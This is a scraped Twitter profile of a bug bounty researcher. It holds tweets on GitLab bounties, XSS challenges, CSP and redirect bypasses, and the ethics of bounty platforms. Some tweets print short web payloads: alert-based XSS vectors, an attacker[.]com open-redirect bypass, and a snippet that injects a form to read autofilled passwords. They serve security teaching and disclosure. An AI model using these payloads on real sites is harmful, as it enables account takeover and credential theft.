Johan Carlsson
@joaxcar
Followers
4,172
Following
156
Media
95
Statuses
1,127
Father and developer during the day, looking for bugs at night 🐞. Using Twitter for infosec only. Also on: @joaxcar @infosec .exchange
Joined January 2022
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Rafah
• 851978 Tweets
#เพลงขึ้นใจ
• 524014 Tweets
GW最終日
• 461263 Tweets
NUNEW 3RDMV IS OUT
• 277489 Tweets
#マリカにじさんじ杯
• 253556 Tweets
#CDTVライブライブ
• 233484 Tweets
ENGFA IN NUNEW 3RDMV
• 205762 Tweets
井上尚弥
• 199720 Tweets
Inoue
• 139960 Tweets
シェリン
• 101697 Tweets
マリカ杯
• 62679 Tweets
フルサイズ
• 59686 Tweets
ボクシング
• 48792 Tweets
#ドレミファドン
• 37201 Tweets
モンスター
• 30082 Tweets
#BF_Masterplan
• 28548 Tweets
ジェシー
• 20632 Tweets
ハマスタ
• 16870 Tweets
井上の試合
• 16310 Tweets
井上ダウン
• 14986 Tweets
井上選手
• 13077 Tweets
筒香ホームラン
• 12745 Tweets
逆転ホームラン
• 10795 Tweets
逆転3ラン
• 10648 Tweets
マリカ事変
• 10508 Tweets
Pinned Tweet
I joined
@gregxsunday
on his podcast a while back. Realized I did not have a tweet with it to “pin”. Here is that tweet. Good intro to what I am doing if someone is curious
1
13
90
Yesterday I made it into top 5 on
@GitLab
bug bounty program 🥳, at the same time crossing 100k in bounties from the same.
Some people are asking me how to get started or where and what to look for. I thought I could share a practical guide if anyone care for a thread [1/6]
26
172
940
Looks like this is the time to learn how to hunt for leaked GitLab tokens 👀
17
55
512
I have finally done my first proper bug write-up! This one is about a SOP bypass in Chrome (escalated to ATO) using the Navigation API. Hope someone finds it interesting.
Feel free to leave me any comments; I want to improve on this!
9
116
508
Did a little writeup of the CSP bypass I reported to PortSwigger. It might be interesting to anyone who saw the disclosed report and wonders if CSP bypasses are the new ripe low-hanging fruit!
4
93
352
Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or is trying to get away from copy pasting payloads
23
46
273
Just dropped off my work computer at the office. From tomorrow I will do bug bounties full time for three months. After that evaluate if my mental health can cope with it.. Wish me good luck!
44
3
269
My first disclosure to reach 100 up-votes on
@Hacker0x01
. Disclosures have been the number one learning resource for me, so to see people finding an interest in my own reports makes me happy! Also thanks
@gitlab
for allowing full disclosures, contributing to this great resource
6
21
259
Free online hacking course 🥳
3
71
346
4
17
167
I have now done half of my three-month full-time hunting. Thought I could share some stats
25 submissions:
🟢1 resolved
🟠12 triaged
🔵6 pending
🟤6 dupes (2 self dupes)
Tools used: 0
Scans run: 0
💰Economy: I paid my salary with that resolved one
13
4
164
Another amazing
@fransrosen
report to study! Guess the arkoselabs[.]com XSS impacted a lot more sites, but nice usage of it here on GitLab in chain to ATO
1
33
163
Try to catch the XSS 🧐
Think this one is a bit harder, but feel free to prove me wrong!
No answers in the comments, please
19
23
144
Finally made it past 3000 reputation. The last 1k took a long time as I have had less time to hunt. For information 3k puts you at top 550 at
@Hacker0x01
, and miles from top 100
11
1
135
After two years and more than 100 written reports, ranging from "self closed" to "high", I finally found my first Critical finding on GitLab's bounty program! A lot of luck but also persistence and grind. Checking one item off the bucket list
7
13
114
I'm glad to see that quite a few people found this interesting!
My solution (and the one that others found) goes like this:
\"-alert(1)}})<!--
Small XSS challenge. Real life situation that I solved today. Should be pretty easy, but good practice if you are just getting into XSS or is trying to get away from copy pasting payloads
23
46
273
1
13
115
Nice bug! Don't really like this "its a third party tool" argument to lower the bounty, think the impact should be the measurement. Always good to look for mentions of this in the program scope
7
9
113
People in the community sending death threats to tool creators when they have issues with their tools!? really? I like this Rs0n guy, he is doing his own thing. Please respect anyone sharing FREE content, or GTFO
7
16
107
Two new DOM sinks to add to any sink list:
setHTMLUnsafe
parseHTMLUnsafe
the first one might start to replace some instances of innerHTML. After Chrome 124 it works in all browsers
1
15
108
Finally, I had time to finish the writeup for the hoist challenges. Hope someone finds it valuable. Great job everyone who solved it!
Try to catch the XSS 🧐
Think this one is a bit harder, but feel free to prove me wrong!
No answers in the comments, please
19
23
144
8
21
101
Another XSS challenge. This one is a bit more contrived.
Mission:
1. just pop alert
2. run arbitrary JS
Don't write the solution in the thread!
4
14
101
Finding a critical bug 5 mins before Friday dinner with my kids, gives mixed feelings.
Destroy dinner by reporting asap or get duped, but with a happy family? Hard choice 🤷♂️
7
0
94
Painful. This needs to be punished harder. It decreases the trust in platforms like H1 and in the long run could hurt opportunities for serious reporters
7
8
87
This one was weird "we had a regression and many others reported it, so we will lower the bounty to 10%". I mean, either you have a vulnerability or you dont. Blaming regression was a new one..
13
7
87
@G0LDEN_infosec
@aszx87410
@terjanq
@kevin_mizu
@garethheyes
are a good start. Gareths book, the three other have a lot of posts on blogs etc. Things like this
2
31
87
Did something fun with this the other week. "Form clobbering"
4
8
85
What about
x.y.z("test-INJECT")
should not be too hard
Somebody asked me recently if you can exploit an XSS scenario like this:
x.y(1,INJECT);
where x and y are not defined. You cannot break out of the script tag, but you can break out of the function call.
I tried everything I could think of to abuse error handling and hoisting…
13
27
149
15
13
80
This report to GitLab by
@ryotkak
shows a great way to use the "dirty dance none happy path OAuth feature", discussed in
@fransrosen
's blog post, to escalate a chain of open redirects to account takeover
1
19
74
Some personal highlights 2022 on
@gitlab
:
- Most valid reports in 2022 (22)
- Made it to top 4 on leaderboard
- 120k bounties
- At least one valid report per month
Great program, great team!
🎉 Here's what a record-breaking Bug Bounty year looks like.
🤑 Awarded a total of $1,055,770 USD in bounties in 2022
📈 Received a total of 920 reports from 424 researchers
🔧 Resolved 158 valid reports and made 94 public
3
25
121
5
0
73
Another XSS in
@GitLab
. This one used an unsanitized URL for the payload, and a poorly sanitized HTML element to increase the impact probability. Delivered to the GitLab server by a spoofed ZenTao server.
0
10
72
2
7
73
Found a small issue in Grafana, the fix is out now in the latest release. CVE-2023-1387
Grafana uses the GitHub vulnerability reporting feature which is really nice to work with, putting some pressure on the big platforms out there 😊
2
10
73
Until recently I have taken zero notes and have to re-google everything all the time. The new me is using
@GitLab
to structure my research 😎
Thanks go out to
@realArcherL
,
@dee__see
, and
@ajxchapman
for amazing tips in
2
22
72
Here we go again! Still no sign of the 20% policy in the policy
@Hacker0x01
😊. Clear rules are important, the guy here spent a lot of extra time working on this issue without info about the hidden rules..
5
15
87
2
4
68
I spent quite some time on this challenge bu
@kevin_mizu
. Ended up finding a new jQuery CSPP gadget using $().on() event creation
Did a writeup on the process of finding the gadget 👇
Challenge time is now over ⏰
TL;DR
- HTML injection
- Axios DOM Based CSPP
- Axios CSPP response overwrite gadget
- jQuery DOM Clobbering + CSPP selector overwrite gadgets
- Setting src attr to "javascript:" for each HTML node ➝ XSS
Detailed writeup 👇
0
13
80
1
11
66
There are some good and common ways to gain redirects, like "@" and "." but I have also had a lot of success with "//". A lot of simple filters check if the URL is "relative" by checking if it starts with a slash, forgetting that //attacker[.]com is not relative.
Freaking good redirect validation bypass payload:
http://attacker[.]com\@test[.]com
The backslash will be normalized to a slash by the browser and result in the OR. I see this issue a lot.
(Obviously [.] is not a part of the payload, it prevents X from turning it into a link)
3
23
176
1
8
67
1-click XSS to ATO rated as LOW severity... glad I am not doing bug bounties full time 🙃
7
2
66
A program on HackerOne have asked me for about 10 retests, without using the paid retest feature. After some days I have now gotten "any update sir" requests on them, the tables have turned! 😊
3
0
55
The easiest way to find out what to look for is the latest security release. See what others are finding at the moment, usually there are more bugs of the same type present [2/6]
1
5
57
Got the third place in Sweden by one point this year 🥳. Have not focused on quantity, and the point system is a bit weird. Still fun gamification though!
6
0
58
Great talk by
@spaceraccoonsec
outlining how to approach the changing landscape of bug-bounty/infosec. The point about plateauing in skill level by getting stuck finding and reporting similar bugs really resonated with me.
0
16
57
Great post by
@garethheyes
. I have used the form trick multiple times. I also find it strange that does not include it in their "safe example" (or as a warning). This could be one of the reasons why it's so often overlooked
Are CSP's getting in the way of scoring that Bug Bounty you have been working on? 😫
Lucky for you, our research team (
@PortSwiggerRes
) has released some new techniques using Form Hijacking to bypass that protection and get you hacking again; enjoy!
2
60
233
1
6
57
A bit of an older interview, but wow this was gold! Thanks
@NahamSec
and
@spaceraccoonsec
for sharing (years ago)
1
11
56
Tweet explained
1. reportError is "new" as of Chrome 95
2. It only takes 1 argument. The second arg here is just an inline assignment
3. You need the = before alert as the string produced by the error is "Uncaught <payload>" and eval needs valid syntax
Nice one! Fun to dig into
The new reportError() function enables a quite amusing XSS vector:
3
49
323
5
4
55
Another HTML injection, resulting in arbitrary POST requests as victim user. In worst case getting admin access to the GitLab instance. Payload delivered through Jira integration
0
6
46
2
7
52
Found a duplicate high severity bug on
@GoogleVRP
. Will nevertheless count it as my first valid bug on their program 🥳
Getting that duplicate email is not a great feeling, but it at least shows that finding Google bugs are not out of reach
2
1
53
Interesting write-up about a blockchain bug. Scoring 1M$ in bounty. Key takeaway after reading: It's all about domain knowledge! The same goes for all programs, there are tons of "simple" bugs that you can only find if you know the domain.
2
6
53
So what's up with this JSONP throwing the "bad callback error" to get executed by the bad callback 🙃
7
6
52
Must admit, I did not know what this Hackvertor thing by
@garethheyes
was all about. After watching this video, I will not be able to live without it! 🙇♂️
1
6
52
Finally got another payout! I can now pay my salary for April as well 😅
@joernchen
no, I have only had to pay myself for one month so far. The next one is due in a week. Let's pray for some more payouts! (on a serious note, I had the economy for all months from the get-go and would not have done this otherwise). But it did pay more than my day job
1
0
4
4
2
51
This is sad as I did not get to use my fun "hidden payload" in userinfo. The second one is still working though!
Also, note that userinfo stays in the URL on relative links!|
My current fav XSS has gone 😢
<script>location.protocol='javascript'</script>
No longer works 👎
6
8
68
2
2
51
From what I can see this is just an UI bug. I would recommend
@Hacker0x01
to fix this promptly as a lot of people are getting confused and making allegations against triagers (tip: dont!). The dupe is same program (all the time)
@jobertabma
#bugbountytip
1
1
49
Nice and clean XSS in GitLab. Worth noting here that the CSP bypass works for all scripts generated by other scripts decorated with a valid nonce. The trust is inherited. In this case jQuery is loaded with a nonce. Included scripts are a great place to look for CSP bypasses
CSP-bypass using jQuery:
if you see $(a).append(html), then try html="<script>alert(1)</script>"
Example:
2
35
121
0
5
47
Great read! Nice attack and great how they took the extra steps to put it into SqlMap
1
12
48
I spend a lot of time playing with quirks in JavaScript. They are often great for hacking. But there is also a case to be made for learning how things are meant to be used. I found this course by Dan Abramov very insightful and highly recommend it:
2
6
46
@garethheyes
@Rhynorater
@avlidienbrunn
@jub0bs
@LiveOverflow
Hey thanks for inspiration!
x.y(alert(1));function x(){}
5
5
46
Let's keep the inspiration flowing. The last three could probably be done better, but I am quite happy with the pathname one.
Wait. What. Hehe.
https://alert(1)@
example. com
<a href=/ id=x>test</a>
<script>
eval(x.username)
</script>
Inspired by:
4
22
175
2
7
46
This is what deep knowledge of your target can do for you while hunting for bugs! Another amazing escalation of a "trivial issue" by
@wcbowling
Getting at the
@gitlab
CTF flag
0
6
46
If I can control response headers on a service, which ones can be abused? Like "Set-Cookie" to set cookies on the domain, "Location" for redirects, and CORS headers to loosen restrictions. What more? The victim is the visitor, I control the response on the target domain. (no XSS)
13
2
43
If you follow these steps you will have learned a LOT about security, DOS issue, GitLab, setting up environments and replicating vulnerabilities. You will also most certainly be in a great position to finding your first bug on the GitLab
@Hacker0x01
program. [6/6]
2
3
44
Turning 37 today. My mother sent me this. Child 1337 😎
(and no thats not my social security number st the bottom)
7
0
45
This report is a great example of the goldmine that
@Hacker0x01
Hacktivity is. The report is a bit confusing, and it took a couple of tries to recreate based on the description. But I had never heard of the Service Worker API before, learning so much from this one!
0
5
43
Some follow up here [7/6]
1. ⚠️ Do not ever test DOS on gitlab[.]com or other production instances! Only self-hosted
2. Why DOS? It's arbitrary, the point is to find an area to focus on to not get analysis paralysis
3. This is how I started, but with a focus on GraphQL AC
3
3
42
This was fun. I disagree with most of it, but still some valid points. They are correct in what they point out is a bad approach to BB, but the idea that they would know everything about an application after one engagement?! well i respectfully disagree
1
4
42
@renniepak
@0xH4rmony
<script/src="//0-a%2enl"></script>
34 chars, browsers are nice enough to correct the missing space
3
6
40
Another great post on hoisting by
@brutelogic
! Missed this one when doing my own research. Interestingly the payload from my post work on the second example (undefined2.php) without hijacking atob
%27-alert(1));function%20myObj(){}//
2
5
40
Not the most advanced bug, but a good one to look for. I have found multiple instances of this in multiple programs. The bug type is also covered in
We all know path traversals. But did you hear about a client-side path traversal? There are few resources about this bug class so many hackers don't check for it. Don't be one of them! Start by watching my explanation of
@joaxcar
's $6,580 bug in GitLab!
3
28
136
0
9
40
Now go to the GitLab issue tracker and search for old DOS security issues. Read them all
Then install any vulnerable version in a docker container
and replicate some of the issues. Try to recreate the ones from 15.3.2 [4/6]
1
4
40
This right here! Not that I ever found a RCE, but this mindset applies to other bug types. For me XSS is part of impact. Bugs that lead me there are usually HTML injections
@intigriti
It’s depends how you look for RCE
Some look for RCE as bug
Some look for RCE as impact
As example LFI to RCE (the bug is LFI and the Impact is RCE)
I look for RCE as impact not bug
& I automate on bugs that can led for RCEs
6
19
170
3
7
39
Sure AI can become a threat to bug hunters income, but I see no one talking about these people trying to deprecate JavaScript URL scheme!
1
6
38
@IM_23pds
It's fake, the writeup is just a rewrite of this one and is also not getting it right. The bug is not in Grafana, it was in Aiven. Don't know why anyone would do this
6
3
39
For us living in the DevTools console
my life is going to become so much smoother! Going to use on monday:
$_
monitor(foo)
getEventListeners($0)
queryObjects(Promise)
1
5
39
It may be too soon for another challenge, but I needed to get this out before posting a write-up about a WebKit mime sniffing bug. Let's see if you can find some unintended solutions here. I guess there could exist a few.
Mission: XSS 🤷♂️
1
10
39
In 15.3.2 there were five DOS bugs, all given a medium severity. DOS bugs like these are present in almost every GitLab security release lately. They are easy enough to replicate, and one can hunt for them both statically and dynamically. [3/6]
1
3
38
I have (yet again) started a new blog, this time using WordPress! Yes you read that correct, no more static site generators for me. I hope this transition will help me acctually post some content. The time will tell, this first one is just to get started
0
2
38
Great interview with
@samm0uda
by
@gregxsunday
. Youssef's approach to bug bounties really resonates with me, will come back and rewatch this one for sure. Thanks for taking the time Youssef!
Last week, I published a video saying $5.5k is my highest bounty. Today, I’m uploading an interview with a hunter who doesn’t bother reporting $4-5k bugs and only focuses on the big ones. It's
@samm0uda
, TOP1 on Facebook leaderboard since 2020. Enjoy!
12
54
322
0
6
36
Turns out that the last one is wrong. That trick only works if you change the schema in the new URL
new URL("http:a.a","
https://b.b")
new URL("https:a.a","
http://b.b")
or
new URL("file:etc/passwd","
https://b.b")
1
10
35
It's been a long winter... I also realized I had broken the challenge... well here is the long-awaited solution.
"in%0balert%60%60in"
or in plain English
"in(mysterious space)alert``in"
Another XSS challenge. This one is a bit more contrived.
Mission:
1. just pop alert
2. run arbitrary JS
Don't write the solution in the thread!
4
14
101
1
5
36
@Rhynorater
using XSS to add a form and steal autofill password 🙂
this one can sometimes bypass some other restrictions, like XSS on a subdomain. But requires a great program, a great PoC, and some smooth report writing!
1
2
33
Hey look at that, I have a CVE in Grafana that I did not know about 😊
1
4
35
My first WebKit bug was resolved. I'm still waiting to see if Apple pays bounties for more minor issues in their apps. The information is not super clear on this. At least I finally have a CVE in all major browsers that I can use to brag with on Linkedin 🙂
1
0
34
Now think about how these issues were fixed and what caused them. Look in the merge requests for 15.3.2
And read how they were mitigated. Try to see if you can find a flaw in the fix, or if anything can point to other vulnerable areas. [5/6]
1
3
34
@PinkDraconian
@PortSwigger
Yes, but if you have XSS you can do this by just adding your own form, no need to find a form
document.body.innerHTML = `<form><input><input id=x type=password></form>`
alert(x.value)
4
0
31
Had a fun chat with
@gregxsunday
, not used to the audio format so it starts out a bit stumbling on my part, but hope someone might get some enjoyment out of it 😊
Other people's reports are a great learning resource but it's even better to ask them about methodology and techniques.
From my interview with
@joaxcar
, you will learn why he was successful in bug bounty since day one and how he climbed to GitLab's TOP4
3
21
114
2
1
32
This week might become the first one on my "full-time" sprint where I will not be able to find a bug. Not the best feeling... Let's hope that Friday proves me wrong
1
0
30
I have been trying to learn to use SQLmap. But trying it on a parameter where the injection needed to break out uses double quote instead of single quote causes SQLmap to miss the injection. Is there an option for this?
6
4
31
I have been doing all my bug hunting upon til now from a 2014 MacBook Air. Thinking about taking the leap and investing in some new hardware. Is it only RAM that matters (due to Burp) or can I benefit from other spec increases?
5
0
29
Programs should just stop shoehorning everything into CVSS. A “one off” leak of some random data can have impact ranging from informative to critical. Just keep a separate bounty table for leaks, and you dont have to bend CVSS to match what you want to pay
@disclosedh1
@bebiksior
While I do agree with the overall assesment of medium severity, the reasoning they give for the CVSS is pretty shit.
Setting user interaction to required with the reasoning : "A staff member that owns the form misconfigured permissions which lead to being able to access the…
4
2
57
0
4
27
@caseyjohnellis
Then, give us the actual purpose!? 😀
Are platforms hosting the VDPs for free? Or BB programs, for that matter. It better not be that platforms are doing this to profit 🤯
Sry for sarcasm, but sometimes it sounds like hunters are the only ones trying to monetize this space
3
2
30
In this thread, I gave the advice to look for DOS bugs in GitLab. Looking through subsequent security-releases that was great advice! Too bad it is really hard to follow even ones own advice sometimes 😀
2
1
27
Every time I start writing a longer post about any subject, I get halfway and then feel like what I am describing is so banal that I am wasting everyone's time. Not to mention my own. I usually don't have imposter syndrome, but when it comes to writing, I lack all confidence.
8
2
27
Got my name on Red Hat acknowledgements page. Found something as I was researching another program. I try to report everything I find as long as the company has some sort of responsible disclosure guidelines. (Cant believe how many companies that don't even have a security email)
1
0
26
Got my own first "Good catch!" some weeks ago, great feeling! This video got me excited to get back into looking at Google products 🐞
0
2
27
@therceman
You can read about their bounty calculation here
These levels are usually for GitLab tokens giving access to their own repos. But you're right they do not accept other user tokens, so do not report those
2
4
26
This will be my first LHE. Super excited! Also super nervous... looking forward to meeting some of the hackers that I have admired since starting on this journey into cybersecurity
Gear up, cyber knights! ⚔️
The countdown begins for the Knights of Elektron Live Hacking Event, a collaboration between Intigriti and
@IntelSecurity
's Project Circuit Breaker! 🌐
The upcoming live hacking event will be unlike anything they’ve ever done before. This Friday,…
6
29
92
2
0
26